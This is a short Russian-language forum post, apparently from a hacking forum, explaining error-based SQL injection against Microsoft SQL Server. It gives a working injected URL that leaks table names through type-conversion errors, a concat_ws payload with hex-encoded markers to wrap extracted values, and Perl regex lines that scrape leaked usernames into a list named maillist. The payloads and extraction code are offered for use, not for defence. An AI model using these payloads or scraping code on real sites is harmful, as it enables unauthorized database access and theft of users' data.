епт, ну допустим запрос
http://site.com/index.php?if=1+or+1=(select+top+1+table_name+from+ information_schema.tables)--
Возвращает тебе:
Conversion failed when converting the nvarchar value 'Users' to data type int.
Тебе нужно Users, вот и пишешь
nvarchar value ' и ' to data type
ЗЫ: Сам вывод у меня идёт такой: select username from users where username=тут_вывод
Ну вот и смотришь что у тебя слева и справа стоит:
push @maillist, ($res->content =~ m/username=([^']+)то что с права/gmi);
Можно еще так сделать
concat_ws(0x72747274727472,0x3a,username,0x3a,0x72 747274727472)
0x72747274727472 = rtrtrtr
тогда
push @maillist, ($res->content =~ m/rtrtrtr: ([^']+):rtrtrtr/gmi);